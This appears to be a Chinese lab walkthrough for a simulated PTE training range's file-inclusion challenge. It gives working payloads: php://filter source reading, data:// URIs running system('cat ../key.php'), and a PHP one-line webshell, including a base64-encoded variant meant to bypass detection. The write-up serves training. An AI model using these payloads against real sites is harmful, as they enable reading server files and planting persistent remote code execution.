PTE靶场包含5道Web题之文件包含靶场,此靶场为模拟靶场
文件包含
从首页中我们知道了需要读取根目录下的key.php文件,尝试获取WebShell
不获取Shell,直接读取key.php文件内容:
使用伪协议php://filter可以达到的目的;
使用data伪协议
使用伪协议data://可以达到注入木马获取WebShell的目的
一、不获取Shell,直接读取key.php文件内容,具体操作步骤如下:
-
- 方法一:使用伪协议php://filter读取key.php文件(../key.php)
构造payload:
http://192.168.110.100:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php 或者 http://192.168.43.99:8083/vulnerabilities/fu1.php?file=php://filter/convert.base64-encode/resource=../key.php
Base64解码后得到结果:
- 方法二:使用data协议,接着查看浏览器页面源代码即可得到key.php中包含的key:
构造payload:
http://192.168.110.100:83/vulnerabilities/fu1.php?file=data:text/txt,<?php system('cat ../key.php')?> 或者 http://192.168.110.100:83/vulnerabilities/fu1.php?file=data:txt/txt,<?php system('cat ../key.php')?>
然后查看网页源代码,如图所示:
二、使用伪协议data://可以达到注入木马获取WebShell的目的
直接使用data协议:
下面两者payload都可以成功,成功注入后连接菜刀,蚁剑等工具即可成功获取webshell
http://192.168.110.100:83/vulnerabilities/fu1.php?file=data:text/txt,<?php @eval($_POST['a']);?> 拓展,若网站有检测一句话木马上传失败,可使用base64编码,将一句话木马编码后使用data协议进行绕过,如下面代码所示:
下面代码中最后的PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=解码后即为一句话木马,注意:一句话木马编码后的结果不能有加号"+",
若有加号在url编码中代表为空格,就会被替换为空格导致木马上传失败。 若存在加号,则可以使用对一句话木马加减空格等方法使编码后的base64编码中不含加号。 http://192.168.110.100:83/vulnerabilities/fu1.php?file=data://text/txt;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=
连接成功:
